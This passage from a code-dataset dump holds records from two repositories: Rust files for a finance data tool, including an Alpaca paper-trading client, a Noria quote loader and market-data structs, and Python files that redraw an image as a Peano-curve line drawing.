struct EditorialTopic {\n pub id: String,\n}\n" }, { "alpha_fraction": 0.6216880679130554, "alphanum_fraction": 0.6233269572257996, "avg_line_length": 28.76422691345215, "blob_id": "492d1b45a8b391ab9a2eb46bf16027b3d5a98933", "content_id": "387817832032805f80aa83f5f02018d5d3b323f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 7322, "license_type": "no_license", "max_line_length": 95, "num_lines": 246, "path": "/apca/src/main.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate reqwest;\nmod keys;\nuse reqwest::header::{HeaderMap, HeaderName, HeaderValue};\n\n//use std::collections::HashMap;\n\npub fn get_headermap() -> HeaderMap {\n let mut headers = HeaderMap::new();\n let key_id = 
HeaderName::from_lowercase(b\"apca-api-key-id\").unwrap();\n let sec_key = HeaderName::from_lowercase(b\"apca-api-secret-key\").unwrap();\n headers.insert(\n key_id,\n HeaderValue::from_str(keys::APCA_API_KEY_ID).unwrap(),\n );\n headers.insert(\n sec_key,\n HeaderValue::from_str(keys::APCA_API_SECRET_KEY).unwrap(),\n );\n\n headers\n}\n\n#[tokio::main]\nasync fn main() -> Result<(), reqwest::Error> {\n let req_ep = \"account\";\n let post_ep = \"orders\";\n let pos_ep = \"positions\";\n let request_url = format!(\"https://paper-api.alpaca.markets/v2/{}\", req_ep);\n let post_url = format!(\"https://paper-api.alpaca.markets/v2/{}\", post_ep);\n let positions_url = format!(\"https://paper-api.alpaca.markets/v2/{}\", pos_ep);\n\n let headers = get_headermap();\n let client = reqwest::Client::builder()\n .default_headers(headers)\n .build()?;\n\n let res = client\n .get(&request_url)\n .send()\n .await?\n //.json::<Vec<ApcaAsset>>()\n .json::<ApcaAccount>()\n .await?;\n\n println!(\"{:#?}\", res);\n\n let order = ApcaPostOrder {\n symbol: \"AAPL\".to_string(),\n qty: 1,\n side: \"buy\".to_string(),\n type_field: \"market\".to_string(),\n time_in_force: \"day\".to_string(),\n //limit_price: None,\n //stop_price: None,\n //extended_hours: None,\n };\n\n println!(\"order struct{:#?}\", order);\n\n let order_res = client\n .post(&post_url)\n .json(&order)\n .send()\n .await?\n .json::<ApcaOrderTmp>()\n .await?;\n\n println!(\"{:#?}\", order_res);\n let positions = client\n .get(&positions_url)\n .send()\n .await?\n .json::<Vec<ApcaPosition>>()\n .await?;\n\n println!(\"{:#?}\", positions);\n\n Ok(())\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct FixRoot {\n pub side: String,\n pub symbol: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub qty: String,\n pub time_in_force: String,\n pub order_class: String,\n pub take_profit: TakeProfit,\n pub stop_loss: StopLoss,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct TakeProfit {\n pub limit_price: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct StopLoss {\n pub stop_price: String,\n pub limit_price: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaPostOrder {\n pub symbol: String,\n pub qty: u64,\n pub side: String, // buy, sell\n #[serde(rename = \"type\")]\n pub type_field: String, // market, limit, stop, stop_limit\n pub time_in_force: String, // day, gtc, opg, cls, ioc, fok\n //pub limit_price: Option<f64>, // if type == limit or stop_limit\n //pub stop_price: Option<f64>, //if type == stop or stop_limit\n //pub extended_hours: Option<bool>,\n // todo take_profit and stop_loss arms\n // pub order_class = Stiring, // simple, bracket, oco, oto\n //pub : bool,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaAsset {\n pub id: String,\n pub class: String,\n pub exchange: String,\n pub symbol: String,\n pub status: String,\n pub tradable: bool,\n pub marginable: bool,\n pub shortable: bool,\n pub easy_to_borrow: bool,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaAccount {\n pub account_blocked: bool,\n pub account_number: String,\n pub buying_power: String,\n pub cash: String,\n pub created_at: String,\n pub 
currency: String,\n pub daytrade_count: i64,\n pub daytrading_buying_power: String,\n pub equity: String,\n pub id: String,\n pub initial_margin: String,\n pub last_equity: String,\n pub last_maintenance_margin: String,\n pub long_market_value: String,\n pub maintenance_margin: String,\n pub multiplier: String,\n pub pattern_day_trader: bool,\n pub portfolio_value: String,\n pub regt_buying_power: String,\n pub short_market_value: String,\n pub shorting_enabled: bool,\n pub sma: String,\n pub status: String,\n pub trade_suspended_by_user: bool,\n pub trading_blocked: bool,\n pub transfers_blocked: bool,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaOrder {\n pub id: String,\n pub client_order_id: String,\n pub created_at: String,\n pub updated_at: String,\n pub submitted_at: String,\n pub filled_at: String,\n pub expired_at: String,\n pub canceled_at: String,\n pub failed_at: String,\n pub replaced_at: String,\n pub replaced_by: String,\n pub replaces: ::serde_json::Value,\n pub asset_id: String,\n pub symbol: String,\n pub asset_class: String,\n pub qty: String,\n pub filled_qty: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub side: String,\n pub time_in_force: String,\n pub limit_price: String,\n pub stop_price: String,\n pub filled_avg_price: String,\n pub status: String,\n pub extended_hours: bool,\n pub legs: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaOrderTmp {\n pub id: String,\n pub client_order_id: String,\n pub created_at: String,\n pub updated_at: String,\n pub submitted_at: String,\n pub filled_at: ::serde_json::Value,\n pub expired_at: ::serde_json::Value,\n pub canceled_at: ::serde_json::Value,\n pub failed_at: ::serde_json::Value,\n pub replaced_at: ::serde_json::Value,\n pub replaced_by: ::serde_json::Value,\n pub replaces: ::serde_json::Value,\n pub asset_id: String,\n pub symbol: String,\n pub asset_class: String,\n pub qty: String,\n pub filled_qty: String,\n pub filled_avg_price: ::serde_json::Value,\n pub order_class: String,\n pub order_type: String,\n #[serde(rename = \"type\")]\n pub type_field: String,\n pub side: String,\n pub time_in_force: String,\n pub limit_price: ::serde_json::Value,\n pub stop_price: ::serde_json::Value,\n pub status: String,\n pub extended_hours: bool,\n pub legs: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct ApcaPosition {\n pub asset_id: String,\n pub symbol: String,\n pub exchange: String,\n pub asset_class: String,\n pub avg_entry_price: String,\n pub qty: String,\n pub side: String,\n pub market_value: String,\n pub cost_basis: String,\n pub unrealized_pl: String,\n pub unrealized_plpc: String,\n pub unrealized_intraday_pl: String,\n pub unrealized_intraday_plpc: String,\n pub current_price: String,\n pub lastday_price: String,\n pub change_today: String,\n}\n" }, { "alpha_fraction": 0.5346359014511108, "alphanum_fraction": 0.547069251537323, "avg_line_length": 29.02666664123535, "blob_id": "680b98410ead0063053b9855e35fdabf8eeea847", "content_id": "b553485364bc2f3e82c88abe81819607527cd498", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2252, "license_type": "no_license", "max_line_length": 97, "num_lines": 75, "path": "/db/src/main.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", 
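For the Alpaca record that just closed: the `#[serde(rename = "type")]` attribute is what lets `client.post(&post_url).json(&order)` emit the `type` key the API expects while keeping `type_field` as a legal Rust identifier. A quick serde round-trip of a trimmed `ApcaPostOrder` showing the wire format; this is a sketch, not the repo's full struct (which also derives `Deserialize` and friends):

```rust
use serde::Serialize;

// Trimmed copy of ApcaPostOrder from apca/src/main.rs.
#[derive(Serialize)]
struct ApcaPostOrder {
    symbol: String,
    qty: u64,
    side: String,
    #[serde(rename = "type")]
    type_field: String,
    time_in_force: String,
}

fn main() {
    let order = ApcaPostOrder {
        symbol: "AAPL".into(),
        qty: 1,
        side: "buy".into(),
        type_field: "market".into(),
        time_in_force: "day".into(),
    };
    // This is the body reqwest's .json(&order) puts on the wire.
    let body = serde_json::to_string(&order).unwrap();
    assert_eq!(
        body,
        r#"{"symbol":"AAPL","qty":1,"side":"buy","type":"market","time_in_force":"day"}"#
    );
}
```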
"text": "use finox::nasdaq::realtime::RealtimeRoot;\nuse noria::prelude::*;\nuse std::{error::Error, time::Duration};\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn Error>> {\n let mut db = ControllerHandle::from_zk(\"127.0.0.1:2181/isit8\")\n .await\n .unwrap();\n\n db.install_recipe(\n \"\n CREATE TABLE Rt(sid varchar(16), t varchar(32), x float, v int, PRIMARY KEY(sid));\n CREATE TABLE Quote(sid varchar(16), qid varchar(32));\",\n )\n .await\n .unwrap();\n\n let mut quotes = db.table(\"Rt\").await.unwrap();\n let mut count = db.table(\"Quote\").await.unwrap();\n println!(\"{:#?} \", quotes.schema());\n println!(\"{:#?} \", count.schema());\n\n let (tickers, _) = finox::gen_secs(\"stocks\");\n let urls = tickers[1..5]\n .iter()\n .map(|x| x.to_nasdaq_rt_url())\n .collect::<Vec<_>>()\n .into_iter()\n .flatten()\n .collect();\n\n let recs = finox::fetch::<RealtimeRoot>(urls)\n .await\n .into_iter()\n .flatten()\n .collect::<Vec<Vec<String>>>();\n let mut noria_recs = vec![];\n\n for rec in recs.iter() {\n let noria_rec: Vec<noria::DataType> = rec.iter().map(|x| x.to_string().into()).collect();\n println!(\"{:#?} \", noria_rec);\n noria_recs.push(noria_rec);\n }\n quotes.perform_all(noria_recs).await.unwrap();\n //count\n // .insert(vec![r[0].clone().into(), format!(\"{}{}\", i, j).into()])\n // .await\n // .unwrap();\n\n println!(\"Finished writing! Let's wait for things to propagate...\");\n tokio::time::delay_for(Duration::from_millis(2000)).await;\n\n db.extend_recipe(\n \"\n QuoteCount: \\\n SELECT Quote.sid, COUNT(qid) as counts \\\n FROM Quote GROUP BY Quote.sid;\n QUERY Quotes: \\\n SELECT Rt.sid, t, x, v, QuoteCount.counts AS counts \\\n FROM Rt LEFT JOIN QuoteCount ON (Rt.sid = QuoteCount.sid) \\\n WHERE Rt.sid = ?;\n \",\n )\n .await\n .unwrap();\n let mut awvc = db.view(\"Quotes\").await.unwrap();\n //imdumb\n let ticks2 = finox::roses::read_tickers(\"../ref_data/tickers_stocks.txt\");\n //for tic in ticks2.iter() {\n let article = awvc.lookup(&[\"aa\".into()], true).await.unwrap();\n println!(\"{:#?} \", article);\n //}\n Ok(())\n}\n" }, { "alpha_fraction": 0.6088401675224304, "alphanum_fraction": 0.6128281950950623, "avg_line_length": 29.393939971923828, "blob_id": "34d5d1a499762acf5065e6f88b5223246dd67748", "content_id": "b66f90feadf572b0e657cd671c53bf9f1806d51a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3009, "license_type": "no_license", "max_line_length": 95, "num_lines": 99, "path": "/finox/src/cme.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct CMERoot {\n pub quote_delayed: bool,\n pub quote_delay: String,\n pub trade_date: String,\n pub quotes: Vec<Quote>,\n pub empty: bool,\n}\n\nimpl crate::HasRecs for CMERoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.quotes.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Quote {\n pub last: String,\n pub change: String,\n pub prior_settle: String,\n pub open: String,\n pub close: String,\n pub high: String,\n pub low: String,\n pub high_limit: String,\n pub low_limit: String,\n pub volume: String,\n pub md_key: String,\n pub quote_code: String,\n pub escaped_quote_code: String,\n pub code: String,\n pub updated: String,\n pub 
percentage_change: String,\n pub expiration_month: String,\n pub expiration_code: String,\n pub expiration_date: String,\n pub product_name: String,\n pub product_code: String,\n pub uri: String,\n pub product_id: i64,\n pub exchange_code: String,\n pub option_uri: String,\n pub has_option: bool,\n pub last_trade_date: LastTradeDate,\n pub price_chart: PriceChart,\n pub net_change_status: String,\n pub high_low_limits: String,\n}\n\nimpl Quote {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.last_trade_date.timestamp.to_string(),\n self.last.to_string(),\n self.change.to_string(),\n self.prior_settle.to_string(),\n self.open.to_string(),\n self.close.to_string(),\n self.high.to_string(),\n self.low.to_string(),\n self.high_limit.to_string(),\n self.low_limit.to_string(),\n self.volume.to_string(),\n self.md_key.to_string(),\n self.quote_code.to_string(),\n self.expiration_month.to_string(),\n self.expiration_date.to_string(),\n self.product_name.to_string(),\n self.product_code.to_string(),\n self.uri.to_string(),\n self.product_id.to_string(),\n self.exchange_code.to_string(),\n self.option_uri.to_string(),\n self.has_option.to_string(),\n ];\n }\n}\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct LastTradeDate {\n pub timestamp: i64,\n pub date_only_long_format: String,\n pub default24: String,\n pub default12: String,\n pub verbose: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct PriceChart {\n pub enabled: bool,\n pub code: String,\n pub month_year: String,\n pub venue: i64,\n pub title: String,\n pub year: i64,\n}\n" }, { "alpha_fraction": 0.6051948070526123, "alphanum_fraction": 0.6064935326576233, "avg_line_length": 31.76595687866211, "blob_id": "5bc03249f1327a4258d72f113af3cd724cfc8ff7", "content_id": "67d4702de4d31aac72bf26135c6bd99f2c984e66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1540, "license_type": "no_license", "max_line_length": 95, "num_lines": 47, "path": "/finox/src/news/wsj.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "// https://video-api.wsj.com/api-video/find_all_videos.asp\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct WSJRoot {\n pub items: Vec<WSJVideos>,\n}\n\nimpl crate::HasRecs for WSJRoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.items.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct WSJVideos {\n pub id: String,\n pub unix_creation_date: i64,\n pub name: String,\n pub description: String,\n pub duration: String,\n #[serde(rename = \"thumbnailURL\")]\n pub thumbnail_url: Option<String>,\n #[serde(rename = \"videoURL\")]\n pub video_url: Option<String>,\n #[serde(rename = \"emailURL\")]\n pub email_url: Option<String>,\n #[serde(rename = \"doctypeID\")]\n pub doctype_id: Option<String>,\n pub column: Option<String>,\n}\n\nimpl WSJVideos {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.id.to_string(),\n self.unix_creation_date.to_string(),\n self.name.to_string(),\n self.description.to_string(),\n self.duration.to_string(),\n self.column.clone().unwrap_or(\"\".to_string()),\n 
self.doctype_id.clone().unwrap_or(\"\".to_string()),\n self.email_url.clone().unwrap_or(\"\".to_string()),\n self.thumbnail_url.clone().unwrap_or(\"\".to_string()),\n ];\n }\n}\n" }, { "alpha_fraction": 0.6919999718666077, "alphanum_fraction": 0.6940000057220459, "avg_line_length": 30.25, "blob_id": "f40d7cfda5bf5c9d653087e0a85fe604fde578cb", "content_id": "f645252e1fa96921ff0cf0024433a0a96640797b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1000, "license_type": "no_license", "max_line_length": 98, "num_lines": 32, "path": "/finox/src/nasdaq/gen.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Status {\n pub r_code: i64,\n pub b_code_message: ::serde_json::Value,\n pub developer_message: ::serde_json::Value,\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct LabelValue {\n pub label: String,\n pub value: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct DateVal {\n pub date_time: String,\n pub value: String,\n}\n\n// #[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub trait HasRecs {\n fn to_recs(&self) -> Vec<Vec<String>>;\n}\n\n// #[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub trait HasRec {\n fn to_rec(&self) -> Vec<String>;\n}\n" }, { "alpha_fraction": 0.6746716499328613, "alphanum_fraction": 0.6840525269508362, "avg_line_length": 28.61111068725586, "blob_id": "14ea91746844c93d11066ca3b47baafb6f2fd0dc", "content_id": "63777e94fc12b4d468478355c2c0e1e48eda79b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2665, "license_type": "no_license", "max_line_length": 95, "num_lines": 90, "path": "/finox/src/misc/sectors.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub id: String,\n pub sector_tree: SectorTree,\n pub content: Content,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct SectorTree {\n pub security: String,\n pub id: String,\n pub name: String,\n pub ni_codes: Vec<String>,\n pub children: Vec<Children>,\n pub percent_change1_day: f64,\n pub weight: i64,\n pub last_update_epoch: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Children {\n pub security: String,\n pub id: i64,\n pub name: String,\n pub ni_codes: Vec<String>,\n pub children: Vec<Children2>,\n pub percent_change1_day: f64,\n pub weight: f64,\n pub last_update_epoch: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Children2 {\n pub security: String,\n pub id: i64,\n pub name: String,\n pub ni_codes: Vec<String>,\n pub percent_change1_day: f64,\n pub weight: f64,\n pub last_update_epoch: String,\n}\n\n#[derive(Default, 
Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Content {\n pub id: String,\n pub articles: Vec<Article>,\n pub videos: Vec<Video>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Article {\n pub headline: String,\n pub url: String,\n pub summary: String,\n pub updated_at: String,\n pub thumbnail: Thumbnail,\n #[serde(rename = \"updatedAtISO\")]\n pub updated_at_iso: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Thumbnail {\n pub base_url: String,\n pub orig_width: i64,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Video {\n pub headline: String,\n pub url: String,\n pub summary: String,\n pub updated_at: String,\n pub thumbnail: Thumbnail2,\n #[serde(rename = \"updatedAtISO\")]\n pub updated_at_iso: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Thumbnail2 {\n pub base_url: String,\n}\n" } ]
55
tannakaken/peanocurvestroke
https://github.com/tannakaken/peanocurvestroke
5eb8c462ab4640d49b47faa020e16dfd10181c90
1ff5d0cccfa6b555948554eb6408c01c27feb818
d85f790a7f73be56b4489b52da607df841b37896
refs/heads/master
2020-05-27T08:25:09.777723
2019-05-26T15:05:13
2019-05-26T15:05:13
188,544,814
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 31, "blob_id": "97c92ca93154ae8a0f66c818569c504cab62c856", "content_id": "cd18cf01805046e513a79c8d3fcf09fe0b217e30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32, "license_type": "permissive", "max_line_length": 31, "num_lines": 1, "path": "/pixelization/__init__.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "from pixelization.main import *\n" }, { "alpha_fraction": 0.5718231797218323, "alphanum_fraction": 0.5939226746559143, "avg_line_length": 20.294116973876953, "blob_id": "cc9ae69eff06b65ad3211a728bd48d0e4ade0c8d", "content_id": "7018f72cd91d244122bb982999048687b4d97069", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 936, "license_type": "permissive", "max_line_length": 76, "num_lines": 34, "path": "/pixelization/main.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom PIL import Image\nimport numpy as np\n\ndef pixelization(filename):\n \"\"\"画像ファイルを開いて\n 画像をモノクロ化し、\n 縮小し、\n 色の濃さを8段階に量子化して返す。\n\n Parameters\n ----------\n filename : str\n 画像ファイル名\n\n Returns\n -------\n arr : numpy.ndarray\n モノクロ化され縮小された画像のピクセルの色の濃さを8段階(0〜7)で表現したnumpy二重配列\n \"\"\"\n im = Image.open(filename)\n monochrome_im = im.convert('L') # モノクロ化\n small_im = monochrome_im.resize((49,49)) # 縮小\n\n arr = np.array(small_im)\n arr = 7 - (arr / (256/8)) # ピクセルの濃さを8段階に量子化\n arr = arr.astype(np.uint8)\n\n return arr\n\nif __name__ == '__main__':\n import os.path\n arr = pixelization(os.path.dirname(__file__) + '/../Giuseppe_Peano.jpg')\n print(arr)\n" }, { "alpha_fraction": 0.4667276442050934, "alphanum_fraction": 0.4827349781990051, "avg_line_length": 26.331249237060547, "blob_id": "9836edeb75baeff90e3704a9928109575a360517", "content_id": "3b5187d00eead475a65d6e32b2307b1c1a9528e5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5327, "license_type": "permissive", "max_line_length": 90, "num_lines": 160, "path": "/peano/main.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom PIL import Image,ImageDraw\nimport sys\n\nclass Peano:\n \"\"\"\n ペアノ曲線の構成法による一筆書きを行うための画像データと\n ペンの現在位置を保持するクラス\n \"\"\"\n def __init__(self, width, height):\n \"\"\"\n 画像データを幅と高さで初期化して、\n ペンの位置を画面左上の原点に置く。\n\n Parameters\n ----------\n width : int\n 画像の幅\n height : int\n 画像の高さ\n \"\"\"\n self.image = Image.new('RGB', (width, height), (255,255,255))\n self.drawing = ImageDraw.Draw(self.image)\n self.x = 0\n self.y = 0\n\n def show(self):\n \"\"\"\n 現在の画像の状態をGUIで表示する。\n \"\"\"\n self.image.show()\n\n def save(self, filename):\n \"\"\"\n 現在の画像データをファイルに保存する。\n\n Parameters\n ----------\n filename : str\n 画像を保存するファイル名\n \"\"\"\n self.image.save(filename)\n\n def goto(self, x,y):\n \"\"\"\n ペンを移動させながら線を引く。\n\n Parameters\n ----------\n x : int\n 移動先のx座標\n y : int\n 移動先のy座標\n \"\"\"\n self.drawing.line((self.x, self.y, x, y), fill=(0,0,0), width=1)\n self.x = x\n self.y = y\n \n def unit(self, x, y, width, height):\n \"\"\"\n ペアノ曲線の一番単純な1つ分の曲線(単位ペアノと呼ぶことにする)を描く。\n\n Parameters\n ----------\n x : int\n 単位ペアノを描く長方形の左上のx座標\n y : int\n 単位ペアノを描く長方形の左上のy座標\n width : int\n 単位ペアノを描く長方形の幅\n height : int\n 単位ペアノを描く長方形の高さ\n \"\"\"\n self.goto(x + width/6, y + height/6)\n self.goto(x + width*5/6, y + height/6)\n self.goto(x + width*5/6, 
y + height/2)\n self.goto(x + width/6, y + height/2)\n self.goto(x + width/6, y + height*5/6)\n self.goto(x + width*5/6, y + height*5/6)\n\n def stroke(self, x, y, width, height, depth):\n \"\"\"\n ピクセルを3x3分割して\n 再帰的にペアノ曲線を描いていく。\n\n Parameters\n ----------\n x : int\n ペアノ曲線を描く長方形の左上のx座標\n y : int\n ペアノ曲線を描く長方形の左上のy座標\n width : int\n ペアノ曲線を描く長方形の幅\n height : int\n ペアノ曲線を描く長方形の高さ\n depth : int\n 0〜7で表現された色の濃さ。(正確には対応しないが)再帰の深さ\n \"\"\"\n if depth <= 0:\n self.unit(x, y, width, height)\n else:\n new_width = width/3\n new_height = height/3\n if depth % 3 == 0:\n odd_depth = depth - 2\n even_depth = depth - 5\n elif depth % 3 == 1:\n odd_depth = depth - 3\n even_depth = depth - 3\n else:\n odd_depth = depth - 4\n even_depth = depth - 1\n self.stroke(x, y, new_width, new_height, odd_depth)\n self.stroke(x+new_width, y+new_height, new_width, -new_height, even_depth)\n self.stroke(x+2*new_width, y, new_width, new_height, odd_depth)\n self.stroke(x+width, y+new_height, -new_width, new_height, even_depth)\n self.stroke(x+2*new_width, y+2*new_height, -new_width, -new_height, odd_depth)\n self.stroke(x+new_width, y+new_height, -new_width, new_height, even_depth)\n self.stroke(x, y+2*new_height, new_width, new_height, odd_depth)\n self.stroke(x+new_width, y+height, new_width, -new_height, even_depth)\n self.stroke(x+2*new_width, y+2*new_height, new_width, new_height, odd_depth)\n\n def stroke_array(self, width, height, data):\n \"\"\"\n 二重配列dataの内容に沿って、\n ペアノ曲線による一筆描き(ペアノ一筆書きと呼ぶことにする)で、\n 画像に線を描いていく。\n\n Parameters\n ----------\n width : int\n ペアノ一筆描きする領域の幅\n height : int\n ペアノ一筆描きする領域の高さ\n data : nump: numpy.ndarray\n 画像のピクセルの色の濃さを8段階(0〜7)で表したnumpy二重配列\n \"\"\"\n rows, columns = data.shape\n x = 0\n y = 0\n wunit = width/columns\n hunit = height/rows\n for row in data:\n if (wunit < 0):\n row = row[::-1]\n for column in row:\n self.stroke(x, y, wunit, hunit, column)\n x += wunit\n y += hunit\n hunit = -hunit\n wunit = -wunit\n hunit = -hunit\n\nif __name__ == '__main__':\n size = 270\n peano = Peano(size,size)\n depth = int(sys.argv[1])\n peano.stroke(0,0,size,size,depth)\n peano.show()\n peano.save(\"peano\" + str(depth) + \".png\")\n" }, { "alpha_fraction": 0.6994949579238892, "alphanum_fraction": 0.7146464586257935, "avg_line_length": 25.399999618530273, "blob_id": "c9094abf81fdd05d8c859e22fb4792a2e8cc8254", "content_id": "bc2c998967f93eea67482501edbb6ec29adae2dc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "permissive", "max_line_length": 53, "num_lines": 15, "path": "/main.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom pixelization import pixelization\nfrom peano import Peano\nimport sys\nimport os.path\n\nfor filename in sys.argv[1:]:\n data = pixelization(filename)\n size = 8100\n peano = Peano(size,size)\n peano.stroke_array(size, size, data)\n withoutext, _ = os.path.splitext(filename)\n output_filename = withoutext + \"_peanocurved.png\"\n peano.save(output_filename)\n" }, { "alpha_fraction": 0.8389534950256348, "alphanum_fraction": 0.854651153087616, "avg_line_length": 20.234567642211914, "blob_id": "dc3b7e0bd3ff5f05432c8e99fc6436c2008adaa8", "content_id": "d3f3e1cede5f5fd34d5becb207946841859c015b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4201, "license_type": "permissive", "max_line_length": 130, "num_lines": 81, "path": "/README.md", "repo_name": 
